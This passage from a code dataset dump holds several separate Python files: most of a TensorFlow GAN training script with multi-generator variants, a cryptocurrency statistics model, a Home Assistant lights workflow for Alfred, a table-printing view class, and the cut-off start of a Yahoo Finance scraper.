'-it{}'.format(ITERS) + \\\n ('-inp_con' if GEN_TYPE == 'vcgan' and INPLACE_COND else '') +\\\n '-d{}g{}-'.format(DDIM,GDIM)+COMMENT\n\n#EXPERIMENT_DIR = os.getcwd() + '/'+ EXP_ROOT_DIR +'/' + EXPERIMENT_NAME\nEXPERIMENT_DIR = './'+ EXP_ROOT_DIR +'/' + EXPERIMENT_NAME\nCHECKPOINT_DIR = EXPERIMENT_DIR + '/checkpoint'\n\nlib.print_model_settings(locals().copy())\ndef save_src(target_file_name):\n if os.path.exists(target_file_name):\n target_file_name += '.new.py'\n with open(sys.argv[0]) as src_file:\n with open(target_file_name,mode='w') as target:\n while True:\n s = src_file.readline()\n if len(s) > 0:\n target.write(s)\n else:\n break\nif WORKMODE == 'train':\n if(os.path.isdir(EXPERIMENT_DIR)==False):\n os.makedirs(EXPERIMENT_DIR)\n \n if(os.path.isdir(CHECKPOINT_DIR)==False):\n os.makedirs(CHECKPOINT_DIR)\n save_src(EXPERIMENT_DIR + '/' + EXPERIMENT_NAME + '.py')\n \nCHECKPOINT_NAME = tf.train.latest_checkpoint(CHECKPOINT_DIR)\nif CHECKPOINT_NAME is None:\n ITER_START = 0\nelse:\n model_file_name = os.path.split(CHECKPOINT_NAME)[1]\n ITER_START = int(model_file_name[model_file_name.rfind('-')+1:]) + 1\n \n\ndef LeakyReLU(x, alpha=0.2):\n return tf.maximum(alpha*x, x)\n\ndef ReLULayer(name, n_in, n_out, inputs):\n output = lib.ops.linear.Linear(name+'.Linear', n_in, n_out, inputs)\n return tf.nn.relu(output)\n\ndef LeakyReLULayer(name, n_in, n_out, inputs):\n output = lib.ops.linear.Linear(name+'.Linear', n_in, n_out, inputs)\n return LeakyReLU(output)\n\ndef Generator_first(n_samples, noise=None,name='Generator',zd=Z1DIM):\n if noise is None:\n noise = tf.random_normal([n_samples, zd])\n\n output = lib.ops.linear.Linear('{}.Input'.format(name), zd, 4*4*4*GDIM, noise)\n output = lib.ops.batchnorm.Batchnorm('{}.BN1'.format(name), [0], output)\n output = tf.nn.relu(output)\n output = tf.reshape(output, [-1, 4*GDIM, 4, 4])\n return output\n\ndef Generator_middle(n_samples,front_results,name='Generator'):\n output = lib.ops.deconv2d.Deconv2D('{}.2'.format(name), 4*GDIM, 2*GDIM, 5, front_results)\n output = lib.ops.batchnorm.Batchnorm('{}.BN2'.format(name), [0,2,3], output)\n output = tf.nn.relu(output)\n\n output = lib.ops.deconv2d.Deconv2D('{}.3'.format(name), 2*GDIM, GDIM, 5, output)\n output = lib.ops.batchnorm.Batchnorm('{}.BN3'.format(name), [0,2,3], output)\n output = tf.nn.relu(output)\n return output\n\ndef Generator_last(n_samples,middle_results,name='Generator'):\n output = lib.ops.deconv2d.Deconv2D('{}.5'.format(name), GDIM, 3, 5, middle_results)\n output = tf.tanh(output)\n return tf.reshape(output, [-1, OUTPUT_DIM])\n\ndef 
DCGenerator(n_samples, noise=None,name='Generator',zd=Z1DIM):\n front_results = Generator_first(n_samples, noise,name,zd)\n middle_results = Generator_middle(n_samples,front_results,name)\n return Generator_last(n_samples,middle_results,name)\n\ndef DCDiscriminator(inputs):\n output = tf.reshape(inputs, [-1, 3, 32, 32])\n\n output = lib.ops.conv2d.Conv2D('Discriminator.1', 3, DDIM, 5, output, stride=2)\n output = LeakyReLU(output)\n\n output = lib.ops.conv2d.Conv2D('Discriminator.2', DDIM, 2*DDIM, 5, output, stride=2)\n if MODE != 'wgan-gp':\n output = lib.ops.batchnorm.Batchnorm('Discriminator.BN2', [0,2,3], output)\n output = LeakyReLU(output)\n\n output = lib.ops.conv2d.Conv2D('Discriminator.3', 2*DDIM, 4*DDIM, 5, output, stride=2)\n if MODE != 'wgan-gp':\n output = lib.ops.batchnorm.Batchnorm('Discriminator.BN3', [0,2,3], output)\n output = LeakyReLU(output)\n\n output = tf.reshape(output, [-1, 4*4*4*DDIM])\n output = lib.ops.linear.Linear('Discriminator.Output', 4*4*4*DDIM, 1, output)\n\n return tf.reshape(output, [-1])\n\ndef ConvMeanPool(name, input_dim, output_dim, filter_size, inputs, he_init=True, biases=True):\n output = lib.ops.conv2d.Conv2D(name, input_dim, output_dim, filter_size, inputs, he_init=he_init, biases=biases)\n output = tf.add_n([output[:,:,::2,::2], output[:,:,1::2,::2], output[:,:,::2,1::2], output[:,:,1::2,1::2]]) / 4.\n return output\n\ndef MeanPoolConv(name, input_dim, output_dim, filter_size, inputs, he_init=True, biases=True):\n output = inputs\n output = tf.add_n([output[:,:,::2,::2], output[:,:,1::2,::2], output[:,:,::2,1::2], output[:,:,1::2,1::2]]) / 4.\n output = lib.ops.conv2d.Conv2D(name, input_dim, output_dim, filter_size, output, he_init=he_init, biases=biases)\n return output\n\ndef UpsampleConv(name, input_dim, output_dim, filter_size, inputs, he_init=True, biases=True):\n output = inputs\n output = tf.concat([output, output, output, output], axis=1)\n output = tf.transpose(output, [0,2,3,1])\n output = tf.depth_to_space(output, 2)\n output = tf.transpose(output, [0,3,1,2])\n output = lib.ops.conv2d.Conv2D(name, input_dim, output_dim, filter_size, output, he_init=he_init, biases=biases)\n return output\n\ndef Normalize(name, inputs):\n if ('Generator' in name):\n return lib.ops.batchnorm.Batchnorm(name,[0,2,3],inputs,fused=True)\n else:\n return inputs\n\ndef ResidualBlock(name, input_dim, output_dim, filter_size, inputs, resample=None, no_dropout=False):\n \"\"\"\n resample: None, 'down', or 'up'\n \"\"\"\n if resample=='down':\n conv_1 = functools.partial(lib.ops.conv2d.Conv2D, input_dim=input_dim, output_dim=input_dim)\n conv_2 = functools.partial(ConvMeanPool, input_dim=input_dim, output_dim=output_dim)\n conv_shortcut = ConvMeanPool\n elif resample=='up':\n conv_1 = functools.partial(UpsampleConv, input_dim=input_dim, output_dim=output_dim)\n conv_shortcut = UpsampleConv\n conv_2 = functools.partial(lib.ops.conv2d.Conv2D, input_dim=output_dim, output_dim=output_dim)\n elif resample==None:\n conv_shortcut = lib.ops.conv2d.Conv2D\n conv_1 = functools.partial(lib.ops.conv2d.Conv2D, input_dim=input_dim, output_dim=output_dim)\n conv_2 = functools.partial(lib.ops.conv2d.Conv2D, input_dim=output_dim, output_dim=output_dim)\n else:\n raise Exception('invalid resample value')\n\n if output_dim==input_dim and resample==None:\n shortcut = inputs # Identity skip-connection\n else:\n shortcut = conv_shortcut(name+'.Shortcut', input_dim=input_dim, output_dim=output_dim, filter_size=1, he_init=False, biases=True, inputs=inputs)\n\n output = inputs\n output 
= Normalize(name+'.N1', output)\n output = tf.nn.relu(output)\n output = conv_1(name+'.Conv1', filter_size=filter_size, inputs=output) \n output = Normalize(name+'.N2', output)\n output = tf.nn.relu(output) \n output = conv_2(name+'.Conv2', filter_size=filter_size, inputs=output)\n\n return shortcut + output\n\ndef OptimizedResBlockDisc1(inputs):\n conv_1 = functools.partial(lib.ops.conv2d.Conv2D, input_dim=3, output_dim=DDIM)\n conv_2 = functools.partial(ConvMeanPool, input_dim=DDIM, output_dim=DDIM)\n conv_shortcut = MeanPoolConv\n shortcut = conv_shortcut('Discriminator.1.Shortcut', input_dim=3, output_dim=DDIM, filter_size=1, he_init=False, biases=True, inputs=inputs)\n\n output = inputs\n output = conv_1('Discriminator.1.Conv1', filter_size=3, inputs=output) \n output = tf.nn.relu(output) \n output = conv_2('Discriminator.1.Conv2', filter_size=3, inputs=output)\n return shortcut + output\n\ndef ResGenerator(n_samples, noise=None,name='Generator',zd=Z1DIM):\n if noise is None:\n noise = tf.random_normal([n_samples, zd])\n output = lib.ops.linear.Linear('{}.Input'.format(name), 128, 4*4*GDIM, noise)\n output = tf.reshape(output, [-1, GDIM, 4, 4])\n output = ResidualBlock('{}.1'.format(name), GDIM, GDIM, 3, output, resample='up')\n output = ResidualBlock('{}.2'.format(name), GDIM, GDIM, 3, output, resample='up')\n output = ResidualBlock('{}.3'.format(name), GDIM, GDIM, 3, output, resample='up')\n output = Normalize('{}.OutputN'.format(name), output)\n output = tf.nn.relu(output)\n output = lib.ops.conv2d.Conv2D('{}.Output'.format(name), GDIM, 3, 3, output, he_init=False)\n output = tf.tanh(output)\n return tf.reshape(output, [-1, OUTPUT_DIM])\n\ndef ResDiscriminator(inputs):\n output = tf.reshape(inputs, [-1, 3, 32, 32])\n output = OptimizedResBlockDisc1(output)\n output = ResidualBlock('Discriminator.2', DDIM, DDIM, 3, output, resample='down')\n output = ResidualBlock('Discriminator.3', DDIM, DDIM, 3, output, resample=None)\n output = ResidualBlock('Discriminator.4', DDIM, DDIM, 3, output, resample=None)\n output = tf.nn.relu(output)\n output = tf.reduce_mean(output, axis=[2,3])\n output_wgan = lib.ops.linear.Linear('Discriminator.Output', DDIM, 1, output)\n output_wgan = tf.reshape(output_wgan, [-1])\n return output_wgan\n\nGenerator = eval('{}Generator'.format(ARCH))\nDiscriminator = eval('{}Discriminator'.format(ARCH))\n\n\ndef print_model_size(tag='',var_list=None):\n total_parameters = 0\n if var_list == None:\n # count all variables\n var_list = tf.trainable_variables()\n for variable in var_list:\n local_parameters = 1\n shape = variable.get_shape() # getting shape of a variable\n for i in shape:\n local_parameters *= i.value # mutiplying dimension values\n total_parameters += local_parameters\n string = tag + \" param size: {:.6f}M \\n\".format(total_parameters / 1.0e6)\n print(string)\n if WORKMODE == 'train':\n with open(EXPERIMENT_DIR + '/' + 'info.txt',mode='a') as f:\n f.write(string + '\\n')\n\nreal_data_int = tf.placeholder(tf.int32, shape=[BATCH_SIZE, OUTPUT_DIM])\nreal_data = 2*((tf.cast(real_data_int, tf.float32)/255.)-.5)\n\n\nz1 = tf.random_normal([BATCH_SIZE, Z1DIM])\nz2 = tf.random_uniform([BATCH_SIZE, N_SUBGEN],1e-8,1-1e-8)# sample uniform instead of applying invers norm CDF, for convinence\n\np_logits = tf.get_variable('p_logits',shape=[N_SUBGEN],dtype=tf.float32,initializer=tf.zeros_initializer())# p_logits are the q_i s in the Paper\np = tf.nn.softmax(p_logits)\nF = tf.one_hot(tf.argmax(tf.log(p)-tf.log(-tf.log(z2)),axis=1),depth=N_SUBGEN)\n\n#define 
model\n#define model\n#define model\n#define model\n#define model\n\ndef bias_fn(z1dim=100,N=10,delta=2):\n if delta < 0.02:\n return 0\n u = (2 * z1dim) ** 0.5 + delta * (1 - 1.0 / (8 * z1dim)) ** 0.5 - 1.0 / (8 * z1dim) ** 0.5\n hs = (u + (u ** 2 + delta * (32 * z1dim) ** 0.5) ** 0.5) ** 2 / 8.0 - z1dim\n b = -1.0 / N * (hs) ** 0.5\n return b\n\nif GEN_TYPE == 'multigen':\n fake_datas_list = [Generator(BATCH_SIZE, z1, 'Generator{}'.format(i)) \\\n for i in range(N_SUBGEN)]\n\n fake_datas = tf.stack(fake_datas_list, axis=2)\n fake_data = tf.squeeze(tf.matmul(fake_datas, tf.expand_dims(F, axis=2)))\nelif GEN_TYPE == 'vcgan':\n bias = bias_fn(Z1DIM,N_SUBGEN,DELTA)\n scale = -bias * N_SUBGEN or 1.0 #when DELTA=0, set scale=1.0, equivalent to common one-hot condition\n print(\"bias={:.4f}, scale={:.4f}\".format(bias,scale))\n # bias = 0\n # scale = 1\n new_z = tf.concat([z1, F * scale + bias], 1)\n new_z_n = tf.transpose([tf.concat([z1, \\\n tf.one_hot(np.ones((BATCH_SIZE), np.float) * i, depth=N_SUBGEN) * scale + bias],1) \\\n for i in range(N_SUBGEN)], (1, 2, 0))\n fake_data = Generator(BATCH_SIZE, new_z, 'Generator', zd=Z1DIM + N_SUBGEN)\nelif GEN_TYPE == 'deligan':\n deligan_biases = tf.get_variable('deligan_biases',\n shape=[Z1DIM, N_SUBGEN], dtype=tf.float32,\n initializer=tf.random_uniform_initializer(-1, 1))\n deligan_scales_sqrt = tf.get_variable('deligan_scales_sqrt',\n shape=[Z1DIM, N_SUBGEN], dtype=tf.float32,\n initializer=tf.constant_initializer(DELIGAN_INIT_SCALE ** 0.5))\n\n deligan_scales = deligan_scales_sqrt ** 2 + 1e-8\n z1_copies = tf.transpose([z1 for i in range(N_SUBGEN)], [1, 2, 0])\n deligan_noise_n = deligan_scales * z1_copies + deligan_biases\n deligan_noise = tf.squeeze(tf.matmul(deligan_noise_n, tf.expand_dims(F, axis=2)))\n\n fake_data = Generator(BATCH_SIZE, deligan_noise, 'Generator')\n\ndisc_real = Discriminator(real_data)\n\ndisc_fake = Discriminator(fake_data)\n\n\nEDGs = tf.placeholder(tf.float32,shape=[N_SUBGEN]) # [E[D(G_i(z))],]\np_loss = -tf.reduce_sum(p * EDGs)\nglobal_step = tf.placeholder(tf.int32,shape=None)\np_lr = tf.train.exponential_decay(PLR,global_step=global_step,\n decay_steps=1000,decay_rate=PLRDR)\np_train_op = tf.train.GradientDescentOptimizer(p_lr).minimize(p_loss,var_list=[p_logits])\n#p_train_op = tf.train.AdamOptimizer(PLR).minimize(p_loss,var_list=[p_sqrt])\n\nif LRLD:\n LRx = tf.maximum(0., 1.-(tf.cast(global_step, tf.float32) / ITERS)) * LR\nelse:\n LRx = LR\n\ngen_params = lib.params_with_name('Generator')\ndisc_params = lib.params_with_name('Discriminator')\n\nif GEN_TYPE == 'deligan':\n gen_params += [deligan_scales_sqrt ,deligan_biases]\n#Todo: Here\n\nif MODE == 'wgan-gp':\n # Standard WGAN loss\n gen_cost = -tf.reduce_mean(disc_fake)\n disc_cost = tf.reduce_mean(disc_fake) - tf.reduce_mean(disc_real)\n\n # Gradient penalty\n alpha = tf.random_uniform(\n shape=[BATCH_SIZE,1],\n minval=0.,\n maxval=1.\n )\n differences = fake_data - real_data\n interpolates = real_data + (alpha*differences)\n gradients = tf.gradients(Discriminator(interpolates), [interpolates])[0]\n slopes = tf.sqrt(tf.reduce_sum(tf.square(gradients), axis=[1]))\n gradient_penalty = tf.reduce_mean((tf.nn.relu(slopes-1.))**2) if RELU_GP else tf.reduce_mean((slopes-1.)**2)\n disc_cost += LAMBDA*gradient_penalty\n gen_train_op = tf.train.AdamOptimizer(learning_rate=LRx, beta1=0.5, beta2=0.9).minimize(gen_cost, var_list=gen_params)\n disc_train_op = tf.train.AdamOptimizer(learning_rate=LRx, beta1=0.5, beta2=0.9).minimize(disc_cost, var_list=disc_params)\n\nelif 
MODE == 'dcgan':\n gen_cost = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=disc_fake, labels=tf.ones_like(disc_fake)))\n disc_cost = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=disc_fake, labels=tf.zeros_like(disc_fake)))\n disc_cost += tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=disc_real, labels=tf.ones_like(disc_real)))\n disc_cost /= 2.\n gen_train_op = tf.train.AdamOptimizer(learning_rate=LRx, beta1=0.5).minimize(gen_cost,var_list=gen_params)\n disc_train_op = tf.train.AdamOptimizer(learning_rate=LRx, beta1=0.5).minimize(disc_cost,var_list=disc_params)\n\n# For generating samples\n# fixed_noise_128 = tf.constant(np.random.normal(size=(128, Z1DIM)).astype('float32'))\nN_SAMPLE_PER_SUBGEN = int(N_SUBGEN * np.ceil(8.0 / N_SUBGEN) ** 2)\nN_TOTAL_SAMPLE = N_SAMPLE_PER_SUBGEN * N_SUBGEN\nif CHECKPOINT_NAME is None:\n common_fixed_noise_ = np.random.normal(size=(N_SAMPLE_PER_SUBGEN, Z1DIM)).astype('float32')\n np.save(CHECKPOINT_DIR + '/common_fixed_noise',common_fixed_noise_)\nelse:\n common_fixed_noise_ = np.load(CHECKPOINT_DIR + '/common_fixed_noise.npy')\ncommon_fixed_noise = tf.constant(common_fixed_noise_)\n\nfixed_F = tf.one_hot(np.linspace(0, N_SUBGEN, num=N_TOTAL_SAMPLE, endpoint=False).astype('int32'), depth=N_SUBGEN)\nif GEN_TYPE == 'multigen':\n fixed_fake_datas_list = [Generator(N_SAMPLE_PER_SUBGEN, common_fixed_noise, 'Generator{}'.format(i)) for i in\n range(N_SUBGEN)]\n fixed_noise_samples = tf.stack(fixed_fake_datas_list, axis=0)\nelif GEN_TYPE == 'vcgan':\n fixed_new_z = tf.concat([tf.constant(np.resize(common_fixed_noise_, \\\n (N_TOTAL_SAMPLE, Z1DIM))), fixed_F * scale + bias], 1)\n fixed_noise_samples = Generator(N_TOTAL_SAMPLE, fixed_new_z, 'Generator', zd=Z1DIM + N_SUBGEN)\n\nelif GEN_TYPE == 'deligan':\n fixed_deligan_noise = tf.concat([common_fixed_noise_ * deligan_scales[:, i] + \\\n deligan_biases[:, i] for i in range(N_SUBGEN)], 0)\n\n fixed_noise_samples = Generator(Z1DIM, fixed_deligan_noise, 'Generator')\n\n\ndef generate_image(frame):\n samples = session.run(fixed_noise_samples)\n samples = ((samples + 1.) * (255. / 2)).astype('int32')\n lib.save_images.save_images(samples.reshape((N_TOTAL_SAMPLE, N_C, N_H, N_W)), \\\n EXPERIMENT_DIR + '/' + 'samples_{}.png'.format(frame))\n\n#low-ram-usage version\ndef save_samples_to_npz(n_samples=50000, step=1,return_samples=False):\n all_samples = []\n for i in trange(int(np.ceil(n_samples * 1.0 / BATCH_SIZE))):\n all_samples.append(((session.run(fake_data) + 1.) * (255. 
/ 2)).astype('uint8'))\n all_samples = np.concatenate(all_samples, axis=0)[:n_samples]\n all_samples = all_samples.reshape((-1, N_C, N_H, N_W)).transpose(0, 2, 3, 1)\n file_name = '{}_samples_iter{}'.format(n_samples,step)\n while True:\n try:\n #np.savez_compressed(EXPERIMENT_DIR + '/', all_samples)\n #saving to /tmp/ and then moving to dst may save time when dst is \n #a network position\n np.savez_compressed('/tmp/' + EXPERIMENT_NAME + file_name,all_samples)\n ret = os.system('cp '+'/tmp/' + EXPERIMENT_NAME + file_name + \n '.npz '+EXPERIMENT_DIR + '/' + file_name + '.npz')\n if ret != 0:\n print(\"error in cp!\")\n continue\n os.remove('/tmp/' + EXPERIMENT_NAME + file_name + '.npz')\n break\n except OSError as e:\n print(\"OSError when saving log, retry after 60s\")\n print(e)\n time.sleep(60)\n except IOError as e:\n print(\"IOError when saving log, retry after 60s\")\n print(e)\n time.sleep(60) \n # to load the array,use \"np.load('xxx.npz.)['arr_0']\"\n if not return_samples:\n all_samples = None\n return all_samples \n\n\ndef get_inception_score(iters, samples):\n score_and_std = lib.inception_score.get_inception_score( \\\n list(samples), bs=16)\n with open(EXPERIMENT_DIR + '/' + 'inception_score.txt', mode='a') as f:\n f.write('{} {} {}\\n'.format(iters, score_and_std[0], score_and_std[1]))\n return score_and_std\n\n\ndef make_dataset_gen(ds):\n p_list = []\n gen_list = []\n\n def inf_train_gen(name, gen):\n while True:\n for images in gen():\n yield images[0].reshape([BATCH_SIZE, -1])\n\n for name, p, path in ds:\n if p != 0:\n if name == 'cifar':\n train_gen, _ = lib.cifar10.load(BATCH_SIZE, data_dir=path)\n else:\n train_gen, _ = dataloader.load(BATCH_SIZE, data_dir=path,\\\n imsize=N_H,validation_ratio=0)\n gen_list.append(inf_train_gen(name, train_gen))\n p_list.append(p)\n\n def inf_train_gen_mix():\n while True:\n count = np.random.multinomial(BATCH_SIZE, p_list)\n for i in range(1, len(count)):\n count[i] += count[i - 1]\n count = [0] + list(count)\n # print(count)\n image_list = []\n for i, gen in enumerate(gen_list):\n images = gen.next()[count[i]:count[i + 1]]\n image_list.append(images)\n images = np.concatenate(image_list)\n yield images\n\n return inf_train_gen_mix\n\nprint_model_size(tag='gen',var_list=gen_params)\nprint_model_size(tag='dis',var_list=disc_params)\nprint_model_size(tag='all_params')\n\n# Train loop\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth = True\nconfig.allow_soft_placement = True\nsession = tf.Session(config=config)\nsession.run(tf.global_variables_initializer())\n\nif WORKMODE == 'train':\n inf_train_gen = make_dataset_gen(DATASETS)\n gen = inf_train_gen()\n #save a batch of real images\n real_samples = gen.next().astype('int32').reshape((BATCH_SIZE, N_C, N_H, N_W))\n lib.save_images.save_images(real_samples,EXPERIMENT_DIR+'/real_samples.png')\nsaver = tf.train.Saver(max_to_keep=None)\nif(CHECKPOINT_NAME!=None):\n saver.restore(session,CHECKPOINT_NAME)\n lib.plot.load(log_dir=EXPERIMENT_DIR,iter_start=ITER_START)\n print(\"model restroed from \" + CHECKPOINT_NAME)\n\nif WORKMODE == 'train':\n for iteration in trange(ITER_START, ITERS):\n start_time = time.time()\n # Train generator\n if iteration > 0:\n _ = session.run(gen_train_op,{global_step:iteration})\n \n #print deligan debug info\n if GEN_TYPE == 'deligan' and (iteration % 250 == 249 or iteration - ITER_START < 5):\n deligan_scales_, deligan_biases_ = session.run([deligan_scales, deligan_biases])\n\n print('mean_deligan_scales = {}' \\\n .format(np.mean(deligan_scales_, 
axis=0).astype('float64').round(4)))\n if iteration == ITER_START:\n deligan_scales_old, deligan_biases_old = deligan_scales_, deligan_biases_\n else:\n deligan_scales_change = np.abs(deligan_scales_old - deligan_scales_).sum()\n deligan_biases_change = np.abs(deligan_biases_old - deligan_biases_).sum()\n print('deligan_scales_change = {:.6f}, deligan_biases_change = {:.6f}' \\\n .format(deligan_scales_change, deligan_biases_change))\n deligan_scales_old, deligan_biases_old = deligan_scales_, deligan_biases_\n\n # Train critic\n if MODE == 'dcgan':\n disc_iters = 1\n else:\n disc_iters = CRITIC_ITERS\n \n if TRAIN_P_PERIOD > 0:# if trainable categorical probabilities\n EDG_j_list = []\n F_batch_list = []\n disc_fake_batch_list = []\n\n for i in xrange(disc_iters):\n if not TRAIN_P_PERIOD > 0: # if fixed categorical probabilities\n _data = gen.next()\n _disc_cost, _ = session.run([disc_cost, disc_train_op],\n feed_dict={real_data_int: _data,global_step:iteration})\n else: # if trainable categorical probabilities\n _data = gen.next()\n _disc_cost, _,F_,disc_fake_ = session.run(\n [disc_cost, disc_train_op,F,disc_fake], \n feed_dict={real_data_int: _data,global_step:iteration})\n F_batch_list.append(F_)\n disc_fake_batch_list.append(disc_fake_)\n lib.plot.plot('train disc cost', _disc_cost)\n\n # learn categorical probabilities\n if TRAIN_P_PERIOD > 0:\n if iteration % TRAIN_P_PERIOD == TRAIN_P_PERIOD - 1 and iteration >= TRAIN_P_START:\n F_batch_list = np.concatenate(F_batch_list)\n disc_fake_batch_list = np.concatenate(disc_fake_batch_list)\n for j in range(N_SUBGEN):\n count_j = np.sum(F_batch_list[:,j])\n if count_j == 0:\n print('WARNING: gen_{} seems dead!'.format(j))\n count_j += 1e-3 #avoid zero division error\n EDG_j = np.sum(disc_fake_batch_list * F_batch_list[:,j]) / (count_j)\n EDG_j_list.append(EDG_j)\n _, p_,p_lr_ = session.run([p_train_op, p,p_lr],\n feed_dict={EDGs: EDG_j_list,global_step:iteration})\n if iteration % 50 == 0:\n print('EDG_j_list = {},p_lr={:.5f}'.format(EDG_j_list,p_lr_))\n print('p_ = {}'.format(p_))\n else:\n p_ = session.run(p)\n for i, p_i in enumerate(p_):\n lib.plot.plot('p_{}'.format(i), p_i)\n \n # if (ENABLE_DIS_CLS_LOSS or ENABLE_GEN_CLS_LOSS):\n # lib.plot.plot('classifier cost', _cls_loss)\n lib.plot.plot('time', time.time() - start_time)\n if iteration % SAVE_SAMPLES_PERIOD == SAVE_SAMPLES_PERIOD - 1:\n samples_50k = save_samples_to_npz(50000, iteration)\n if CALC_INCEPTION_SCORE:\n inception_score = get_inception_score(iteration, samples_50k)\n lib.plot.plot('inception score', inception_score[0])\n\n if iteration % PREVIEW_PERIOD == PREVIEW_PERIOD - 1:\n generate_image(iteration)\n\n # Save logs every 100 iters\n if (iteration < 5) or (iteration % 500 == 499):\n lib.plot.flush(log_dir=EXPERIMENT_DIR,header=EXPERIMENT_NAME)\n\n if (iteration % SAVE_CHECKPOINT_PERIOD == (SAVE_CHECKPOINT_PERIOD - 1)):\n try:\n while True:\n saver.save(session, CHECKPOINT_DIR + \"/my_model\", \\\n global_step=iteration)\n break\n except OSError as e:\n print(\"OSError when saving log, retry after 60s\")\n print(e)\n time.sleep(60)\n except IOError as e:\n print(\"IOError when saving log, retry after 60s\")\n print(e)\n time.sleep(60) \n\n lib.plot.tick()\n if TRAIN_P_PERIOD > 0 and iteration == ITERS - 1: # log last p to txt\n with open(EXPERIMENT_DIR + '/' + 'p_{:.4f}.txt'\\\n .format(p_.min()),mode='a') as f:\n for i,p_i in enumerate(p_):\n f.write('p{}\\t{:.8f}\\n'.format(i,p_i))\n print('Training finished!')\nelse: # WORKMODE == 'generate'\n 
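# generate mode: write one grid of fixed-noise samples (saved as samples_final.png)\n    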
generate_image('final')\n print('Generating finished!')\n\n","sub_path":"wgan-gp-DC-32x32-10subgen-vcgan-lr0.0001-dt3.0-tpp0-cifar-it200000-inp_con-d64g64-run1.py","file_name":"wgan-gp-DC-32x32-10subgen-vcgan-lr0.0001-dt3.0-tpp0-cifar-it200000-inp_con-d64g64-run1.py","file_ext":"py","file_size_in_byte":28651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"641001896","text":"from datetime import datetime\n\n\nclass Statistics:\n \"\"\" Model representing summary statistics of a cryptocurrency \"\"\"\n\n def __init__(self, no_blocks, no_address_relations, no_addresses,\n no_clusters, no_txs, no_tags, timestamp, currency):\n tstamp = datetime.utcfromtimestamp(timestamp) \\\n .strftime(\"%Y-%m-%d %H:%M:%S\")\n ledger = {'visible_name': currency.upper() + ' Blockchain',\n 'id': currency + '_ledger',\n 'version': {'nr': str(no_blocks), 'timestamp': tstamp},\n 'report_uuid': currency + '_ledger'}\n self.no_blocks = no_blocks\n self.no_address_relations = no_address_relations\n self.no_addresses = no_addresses\n self.no_entities = no_clusters\n self.no_txs = no_txs\n self.no_labels = no_tags\n self.timestamp = timestamp\n self.tools = []\n self.data_sources = [ledger]\n self.notes = []\n\n @staticmethod\n def from_row(row, currency):\n return Statistics(row.no_blocks, row.no_address_relations,\n row.no_addresses, row.no_clusters,\n row.no_transactions, row.no_tags, row.timestamp,\n currency)\n\n def to_dict(self):\n return self.__dict__\n","sub_path":"gsrest/model/general.py","file_name":"general.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"319534201","text":"import home_assistant as util\nimport icon as icon\nimport sys\nimport argparse\nfrom workflow import (Workflow, ICON_WEB, ICON_INFO, ICON_WARNING, PasswordNotFound)\nfrom workflow.background import run_in_background, is_running\n\ndef main(wf):\n\n\t####################################################################\n # Get init data\n ####################################################################\n parser = argparse.ArgumentParser()\n parser.add_argument('query', nargs='?', default=None)\n args = parser.parse_args(wf.args)\n\n password = util.getPassword(wf);\n url = util.getURL(wf);\n\n ####################################################################\n # Fetch all data in background if the query is empty\n ####################################################################\n if args.query == None:\n if not is_running('update'):\n cmd = ['/usr/bin/python', wf.workflowfile('update_data.py')]\n run_in_background('update', cmd)\n\n data = util.getData(wf, 'light')\n\n def search_key_for_post(post):\n \"\"\"Generate a string search key for a post\"\"\"\n item = data[post]\n\n elements = []\n elements.append(item['name']) # title of post\n elements.append(item['friendly_name'])\n elements.append(item['entity_id'])\n\n return u' '.join(elements)\n\n def wrapper():\n return data\n\n posts = wf.cached_data('allLights', wrapper, max_age=1)\n\n # If script was passed a query, use it to filter posts\n if args.query and data:\n \tposts = wf.filter(args.query, data, key=search_key_for_post, min_score=20)\n\n if not posts: # we have no data to show, so show a warning and stop\n wf.logger.info(\"hi\")\n wf.add_item('No posts found', icon=ICON_WARNING)\n wf.send_feedback()\n return 0\n\n\n # Loop through the returned posts and add an item for each to\n # the list of results for 
Alfred\n    #for post in posts:\n\n    for post in posts:\n        #sys.stderr.write(\"post : \" + str(post) + '\\n')\n        item = data[post];\n        subtitle = ''\n\n        if item['state'] != 'unavailable':\n\n            if item['state'] == 'on':\n                ICON = icon.getIcon('light-on', 'w')\n                subtitle = ' to turn OFF light'\n            else:\n                ICON = icon.getIcon('light-off', 'b')\n                subtitle = ' to turn ON light'\n\n            wf.add_item(title=item['friendly_name'],\n                    subtitle=subtitle,\n                    valid=True,\n                    arg=item['entity_id'],\n                    icon=ICON)\n\n    # Send the results to Alfred as XML\n    wf.send_feedback()\n    return 0;\n\nif __name__ == '__main__':\n    wf = Workflow()\n    log = wf.logger\n    sys.exit(wf.run(main))\n","sub_path":"alfred/Alfred.alfredpreferences/workflows/user.workflow.B7E8DDC9-1D46-4092-B2ED-6C223C606FF6/ha_lights.py","file_name":"ha_lights.py","file_ext":"py","file_size_in_byte":2787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"29354264","text":"class View:\n    def perform_log(self, command):\n        print('Command \`{0}\` successfully performed'.format(command))\n\n    def fetch_data_log(self, titles, data):\n        t = \"\"\n        for title in titles:\n            t += \"{:25}\".format(title)\n        print(t)\n\n        for row in data:\n            str_row = \"\"\n            for el in row:\n                str_row += \"{:25}\".format(str(el))\n            print(str_row)\n    ","sub_path":"lab2/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"604018805","text":"from bs4 import BeautifulSoup\nimport requests as re\n\ndef get_soup(url: str, html: str = None) -> BeautifulSoup:\n    if html is None:\n        response = re.get(url)\n        text = response.text\n    else:\n        text = html\n    return BeautifulSoup(text,features=\"html.parser\")\n\ndef get_recent_val(key,yahoo_soup):\n    val = yahoo_soup.select(f\"div:has(> div[title=\\\"{key}\\\" i]) + div > span\")\n    assert len(val) == 1\n    val = val[0]\n    return val.text\n\nclass YahooTicker:\n    def __init__(self, ticker: str, htmls: dict = None):\n        self.ticker = ticker.strip()\n        base_url = f\"https://finance.yahoo.com/quote/{self.ticker}/\"\n        fin_url = base_url + f\"financials?p={self.ticker}\"\n        bal_sheet_url = base_url + 